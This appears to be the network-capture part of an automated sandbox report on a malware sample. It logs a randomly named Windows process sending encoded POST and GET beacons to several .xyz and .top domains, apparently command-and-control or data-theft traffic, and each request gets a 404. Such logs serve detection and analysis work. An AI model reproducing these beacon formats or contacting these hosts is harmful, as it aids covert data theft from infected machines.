                                                                                                                                                                              23192.168.2.450030172.67.154.67803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:20.378134012 CET10806OUTPOST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4d 4e 57 78 6b 48 2f 76 74 6a 7a 62 61 4c 43 78 32 58 78 6a 6a 2b 71 4f 63 70 30 41 37 2b 65 2b 39 56 39 2f 48 37 6b 53 79 56 6b 49 31 63 68 4c 38 5a 4b 65 6b 46 46 53 42 6c 55 55 70 46 4e 63 6f 52 4c 59 57 2b 61 5a 73 70 4e 44 2b 78 52 67 63 65 58 65 59 4c 2f 71 39 4e 6c 59 41 51 76 2b 44 52 57 44 63 43 54 56 67 64 49 66 75 4b 63 66 6b 6a 74 65 58 55 4f 47 6e 48 49 6c 75 76 70 66 33 4f 33 57 63 44 50 58 32 4f 71 57 50 62 38 69 61 2f 76 52 4f 34 42 62 6c 57 67 45 4e 33 4d 56 6c 4f 59 52 4f 56 75 4d 4e 75 65 39 66 78 65 45 59 35 36 6d 75 7a 6b 66 49 30 65 49 31 37 6d 42 52 6c 67 31 47 4f 71 63 61 6c 44 4c 61 68 2b 37 38 61 38 6e 46 6e 65 75 6e 78 65 77 57 78 70 62 42 79 52 70 31 55 6e 57 57 79 4c 57 42 66 6a 36 64 75 48 4e 54 4c 4a 56 6b 65 67 4a 2f 32 74 52 76 57 6d 34 65 47 52 50 4d 39 4e 47 4f 4f 54 6c 41 4d 70 72 65 68 34 51 32 4c 4e 58 53 56 6d 32 62 59 6e 61 4c 49 4b 50 35 6e 32 41 2f 41 35 49 4b 65 5a 52 61 65 67 4a 5a 32 6f 77 51 7a 5a 5a 46 2f 73 42 72 45 30 73 55 6e 30 4d 6b 68 6e [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=MNWxkH/vtjzbaLCx2Xxjj+qOcp0A7+e+9V9/H7kSyVkI1chL8ZKekFFSBlUUpFNcoRLYW+aZspND+xRgceXeYL/q9NlYAQv+DRWDcCTVgdIfuKcfkjteXUOGnHIluvpf3O3WcDPX2OqWPb8ia/vRO4BblWgEN3MVlOYROVuMNue9fxeEY56muzkfI0eI17mBRlg1GOqcalDLah+78a8nFneunxewWxpbByRp1UnWWyLWBfj6duHNTLJVkegJ/2tRvWm4eGRPM9NGOOTlAMpreh4Q2LNXSVm2bYnaLIKP5n2A/A5IKeZRaegJZ2owQzZZF/sBrE0sUn0MkhnzriC29WD/MHi+2H1K5HqzOt3k61Fv4AxbcW1Mf+5fGAhsziCw4ayd2amuzWCNXfFUHqlgc25yDUzwT4gaMVMf05lNhsZOyO14ToGIIUnRAcZX+hMJnYhOoqzbzrTsPzk5L2PqLkdDLDd0QGbil5e+edMWEtmmWL1VsaUy49B94ihOV2vX2X87Eqp7488HSIq7vO1kCGT5ec5Qqu1IzINIiplLbQyEYEtKtY4O2Lg2TviMXa/3hmj3hkF3Cc3nIElblb+XFzN8oej8clt+9EJbJDaS9ym+0P324ud+FPbpQ7tsyVgVFQjr9d3vIF2zIdQUdEE56dG5WSRbbBLtYLmMOj1m9f5pljsLWm8Dc1JtrJTBLsOW/rubfhzzT0F4fmmY4cCmp9l1gR21tAn/UQMlQwUNi/CRHmiRmiewT3vfprj2xQ/tqOdkE6XksSahXnBJ7jJ2hXgloJiYfG775PxffYaYaFwoz1KaWe8Xog2czwxaqPERp43AX3WUBlIVNbSdY8f4CgTThnv2IRFwDfWWXk0jpXAWvEuNPm2wRwFve1xcI2Tvkrt7sdE62xekAZUOUctzGIfHlhy+ikpaA+c5e7k1QRY40XtOo9w52mTDPVBzHE3ucIoY91EXHpKmM6o9L8Y5ryrauTvmxM57/QsnzZtZ/ADtTYdd8 [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:39:21.055593967 CET1030INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:20 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzRp0ITpMiKMmyqvDYE1xNjy3Lah1je4q%2FIS0Upv7LW9qevGZg4yWiG%2FofLNMKnn0SZXK1%2FPhoNLe2rA5qckraWgi%2FGznFJ0LVXn2zWKijQRPFVynSKAqSTox39thQdHPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9663ad812e72-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2173&sent=3&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: e1LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=i0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              24192.168.2.450031172.67.154.67803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:22.943212032 CET449OUTGET /jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:39:23.643114090 CET1035INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:23 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex3NA40qn75CUdLhGIHIJeT%2Fh5Q3gt3uDkQuj0zOs5DrOvfGrCm4hdvuJ4%2BMltLEVJl2gxny37spWt2QFejTdvRzb6yKU6HazCWEoDjrrf84tlKSZRUKcHOttHICwQPlQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9673ba1ca916-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1927&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=449&delivery_rate=0&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 30 39 31 32 31 30 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              25192.168.2.45003220.2.249.7803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:30.682261944 CET704OUTPOST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 78 57 50 67 51 58 50 72 64 6f 52 32 2f 6a 48 41 2f 47 47 48 52 45 30 33 34 53 4e 47 67 30 4e 46 39 69 41 73 44 77 6c 34 74 45 6f 78 46 67 6f 34 31 46 33 56 73 55 42 43 6c 4e 7a 68 4f 43 77 4f 68 34 4f 73 50 64 39 2b 64 77 51 44 41 63 69 6d 41 77 4a 49 2f 38 36 57 52 57 41 38 41 52 36 45 45 42 53 4d 44 4e 4a 2f 55 46 53 49 6d 5a 59 5a 62 71 61 34 7a 6c 68 74 44 30 42 2b 69 62 63 4b 39 70 6a 46 41 78 63 58 6d 71 38 58 55 77 31 77 33 46 36 51 4f 45 69 6f 33 74 4b 47 36 6a 67 36 6f 5a 31 43 4d 41 67 71 39 72 59 69 77 47 52 35 78 5a 53 57 2b 57 53 50 4f 41 38 4f 79 31 46 4e 36 67 3d 3d
                                                                                                                                                                              Data Ascii: 78=xWPgQXPrdoR2/jHA/GGHRE034SNGg0NF9iAsDwl4tEoxFgo41F3VsUBClNzhOCwOh4OsPd9+dwQDAcimAwJI/86WRWA8AR6EEBSMDNJ/UFSImZYZbqa4zlhtD0B+ibcK9pjFAxcXmq8XUw1w3F6QOEio3tKG6jg6oZ1CMAgq9rYiwGR5xZSW+WSPOA8Oy1FN6g==
                                                                                                                                                                              Oct 31, 2024 01:39:31.629831076 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:31 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              26192.168.2.45003320.2.249.7803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:33.235064030 CET724OUTPOST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 78 57 50 67 51 58 50 72 64 6f 52 32 2b 44 33 41 7a 48 47 48 47 55 30 34 33 79 4e 47 70 55 4e 5a 39 69 4d 73 44 31 63 6c 73 33 41 78 46 42 59 34 6e 51 44 56 35 55 42 43 39 39 7a 67 41 69 77 52 68 34 44 54 50 59 64 2b 64 77 45 44 41 64 53 6d 41 48 31 4c 77 4d 36 55 5a 32 41 36 45 52 36 45 45 42 53 4d 44 4e 4e 52 55 46 4b 49 36 36 51 5a 62 4c 61 2f 74 56 68 75 54 45 42 2b 31 4c 63 4f 39 70 6a 64 41 77 41 39 6d 76 34 58 55 77 6c 77 33 55 36 66 58 30 69 75 39 4e 4c 78 2b 79 38 30 6d 72 4d 71 48 52 63 2f 6a 35 42 43 31 41 63 6a 67 6f 7a 42 73 57 32 38 54 48 31 36 2f 32 34 45 68 69 4f 48 2f 4d 66 37 4c 78 6f 31 55 4f 4b 70 33 64 6b 2b 39 77 34 3d
                                                                                                                                                                              Data Ascii: 78=xWPgQXPrdoR2+D3AzHGHGU043yNGpUNZ9iMsD1cls3AxFBY4nQDV5UBC99zgAiwRh4DTPYd+dwEDAdSmAH1LwM6UZ2A6ER6EEBSMDNNRUFKI66QZbLa/tVhuTEB+1LcO9pjdAwA9mv4XUwlw3U6fX0iu9NLx+y80mrMqHRc/j5BC1AcjgozBsW28TH16/24EhiOH/Mf7Lxo1UOKp3dk+9w4=
                                                                                                                                                                              Oct 31, 2024 01:39:34.175077915 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:34 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              27192.168.2.45003420.2.249.7803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:35.768433094 CET10806OUTPOST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 78 57 50 67 51 58 50 72 64 6f 52 32 2b 44 33 41 7a 48 47 48 47 55 30 34 33 79 4e 47 70 55 4e 5a 39 69 4d 73 44 31 63 6c 73 78 59 78 47 33 73 34 31 6a 62 56 72 6b 42 43 6a 4e 7a 39 41 69 78 4e 68 38 6e 66 50 59 5a 45 64 7a 38 44 43 37 75 6d 43 32 31 4c 6e 38 36 55 56 57 41 2f 41 52 36 4e 45 42 69 41 44 4e 64 52 55 46 4b 49 36 36 38 5a 53 36 61 2f 76 56 68 74 44 30 42 49 69 62 63 32 39 74 50 4e 41 77 45 48 6d 37 4d 58 55 52 56 77 36 47 53 66 49 45 69 73 2b 4e 4c 70 2b 79 78 32 6d 72 51 49 48 52 34 56 6a 37 64 43 34 55 45 36 31 4c 62 73 77 32 54 6c 51 42 39 47 6b 56 63 48 6d 79 4f 6d 7a 39 44 43 64 41 67 4e 57 63 33 78 6c 5a 59 66 6b 46 6c 6e 66 30 69 4b 6c 4b 42 75 39 32 6a 46 31 58 38 5a 4d 39 48 67 55 4d 6c 56 58 32 6d 67 63 4e 32 7a 4a 44 32 39 42 41 2b 7a 75 71 78 2b 48 39 44 73 50 38 4a 54 38 35 35 37 6f 73 42 65 4f 39 51 31 31 45 55 2f 6e 41 7a 79 50 64 41 74 63 71 6f 63 49 32 4b 34 6f 76 41 7a 39 43 6b 6c 6c 41 59 6f 37 64 62 47 51 47 4a 2f 32 50 6f 67 43 4c 70 64 4a 51 42 74 44 34 6b [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=xWPgQXPrdoR2+D3AzHGHGU043yNGpUNZ9iMsD1clsxYxG3s41jbVrkBCjNz9AixNh8nfPYZEdz8DC7umC21Ln86UVWA/AR6NEBiADNdRUFKI668ZS6a/vVhtD0BIibc29tPNAwEHm7MXURVw6GSfIEis+NLp+yx2mrQIHR4Vj7dC4UE61Lbsw2TlQB9GkVcHmyOmz9DCdAgNWc3xlZYfkFlnf0iKlKBu92jF1X8ZM9HgUMlVX2mgcN2zJD29BA+zuqx+H9DsP8JT8557osBeO9Q11EU/nAzyPdAtcqocI2K4ovAz9CkllAYo7dbGQGJ/2PogCLpdJQBtD4kduCesBStB/qVtBnMn/Pa/Jko/6DroB0k8BnMDgs2w5vMX43Cd65qnrstxnrZ3cv/CjAtkgNQPUzmoujYFulG7H6IrNGwZOFAJbxDkFH5/VtnzRsNiUdLVYUgAiBK5faqFksIabcgw4GisRpG1FarUufc/ZHVtdlKIxyZ1OGLmi2GExXoOjMBoucnc8az71MAdBOWB3JEePYB96LFEzvALYRLsf67IJOOL3en+tpZqb056S1TTAAB9NaumM0gQMC32qnN5an97UTNKNHwiwU2EMfoElMb9h/Be1ViGIzIQr3L8Z2dAtYRiGHVpHHscXDqh2PfOYwNdfJbph8HjOhaMwyNC/8KAUXU0Qm+1+imFIHlGj/o3yYli46T8GPlW5eF3pLy7wCJPQTVbGhdBI9CElAac5W90z8766cVEJ7xBZKacdH4Nkz/Yc4iknNlcn3sZoxUSR1TgrkN5YwTm9lyQ8LUgK6KgZOmHHB0yVKxTaJtKgb0+xL4QcMrPtqtikeeBsjMew+Di/bT9V5HJx31zMXJUbOZx39tc7dsqKifUA8pcrzjZtLlQkgMKu1tqTHCrbpfd+t2EOlSDvViy2UQk6F0pAfTYWBE8/loBuklHmOZmwYdQ5C4jznCS8soWZc5+FebP1q+4lVB5HSBxSp4boX42EUbYPmGDm [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:39:36.709728956 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:36 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              28192.168.2.45003520.2.249.7803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:38.311378956 CET449OUTGET /wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:39:39.232633114 CET289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:39 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              29192.168.2.450036203.161.49.193803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:44.955065012 CET707OUTPOST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 34 48 67 73 69 6e 46 47 54 4f 6e 36 65 44 49 67 6b 44 65 57 32 56 67 75 64 54 37 50 66 6f 75 6d 59 31 59 52 64 71 74 73 6e 41 2f 43 2f 71 4b 2f 63 46 56 35 4f 55 71 68 32 50 76 74 5a 72 33 67 6e 2f 39 4c 4e 64 2f 4c 51 55 59 46 35 48 54 63 59 45 4b 4d 48 59 70 57 44 39 59 37 72 35 57 7a 49 73 67 56 36 61 77 71 45 57 38 79 4f 57 74 73 59 46 76 4e 7a 65 42 6a 42 79 7a 67 41 6f 34 71 6a 52 47 6e 31 51 70 2b 50 31 6d 49 79 2b 43 70 73 66 36 4e 4f 70 6f 34 66 41 6b 57 72 46 53 66 70 74 43 70 2b 2f 47 49 44 6d 58 78 61 35 71 38 45 2f 67 32 43 52 38 44 39 2b 44 37 62 48 6d 4a 76 77 3d 3d
